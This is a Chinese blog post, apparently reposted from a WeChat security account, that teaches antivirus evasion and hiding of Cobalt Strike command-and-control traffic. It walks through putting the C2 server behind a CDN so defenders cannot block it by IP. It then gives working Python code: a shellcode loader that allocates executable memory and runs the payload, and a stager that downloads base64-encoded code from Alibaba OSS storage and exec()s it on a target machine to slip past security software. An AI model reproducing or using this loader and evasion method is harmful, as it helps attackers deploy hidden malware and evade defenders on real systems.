免杀对抗-防溯源拉黑+防流量审计

admin 2024年1月9日12:28:44评论31 views字数 1332阅读4分26秒阅读模式

防朔源拉黑-CDN节点

1.购买一个域名,开启开启cdn

免杀对抗-防溯源拉黑+防流量审计

2.全球ping一下域名,可以看到cdn生效

免杀对抗-防溯源拉黑+防流量审计

3.根据自己cs版本修改对应c2项目文件

下载:https://github.com/threatexpress/malleable-c2

免杀对抗-防溯源拉黑+防流量审计

打开文件搜索http-get,将如下图修改为设置cdn的域名

免杀对抗-防溯源拉黑+防流量审计

搜索http-post,将如下图修改为设置cdn的域名

免杀对抗-防溯源拉黑+防流量审计

4.将该文件上传到服务端cs目录下

免杀对抗-防溯源拉黑+防流量审计

5.服务端启动cs时,执行命令:./teamserver ip 密码 jquery-c2.4.3.profile

免杀对抗-防溯源拉黑+防流量审计

6.启动客户端cs连接,创建监听器。将下图位置填写为设置cdn的域名。

免杀对抗-防溯源拉黑+防流量审计

7.如此防溯源拉黑操作就完成了

当设置木马远程连接的地址是本机真实ip时,对方可以使用流量监测工具看到网络外联,当其拉黑ip后我们便不能正常通信了。
        配置cdn,让木马远程连接的地址是我们域名上配置的cdn节点,就算拉黑某个cdn节点的ip,其他的cdn节点ip也会顶替上来,还是能够正常通信。

防流量审计-OSS存储-上线

1.阿里云配置OSS对象存储

免杀对抗-防溯源拉黑+防流量审计

2.将如下加载代码替换shellcode后进行base64编码

加载器代码:

import ctypes

shellcode=b'你的shellcode'

ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64

rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)

ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(rwxpage), ctypes.create_string_buffer(shellcode), len(shellcode))

handle = ctypes.windll.kernel32.CreateThread(0, 0,ctypes.c_uint64(rwxpage), 0, 0, 0)

ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

编码:

编码成功保存到txt文件中

免杀对抗-防溯源拉黑+防流量审计

3.txt文件上传到阿里云oss,上传成功点击分享,获取访问链接

免杀对抗-防溯源拉黑+防流量审计

4.将访问链接写入如下python加载代码

代码:http.py

import ctypes,base64

from urllib.request import urlopen

url=urlopen("访问链接")

z=url.read()

zx=base64.b64decode(z)

exec(zx)

5.http.py上传到目标系统,使用python执行即可上线(也可以打包成exe程序上传)

绕过检测

免杀对抗-防溯源拉黑+防流量审计

成功上线

免杀对抗-防溯源拉黑+防流量审计

6.为什么使用OSS

在做shellcode分离时,如果从一个不受信任的url加载shellcode,可能会被杀软检测拦截。
使用阿里云的OSS存储,加载shellcode文件,那么url是阿里云的,是绿标网站,就会被杀软放行。

网络安全技术交流新建wx群:

免杀对抗-防溯源拉黑+防流量审计

QQ群:708769345

原文始发于微信公众号(小黑子安全):免杀对抗-防溯源拉黑+防流量审计

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月9日12:28:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   免杀对抗-防溯源拉黑+防流量审计https://cn-sec.com/archives/2374397.html

发表评论

匿名网友 填写信息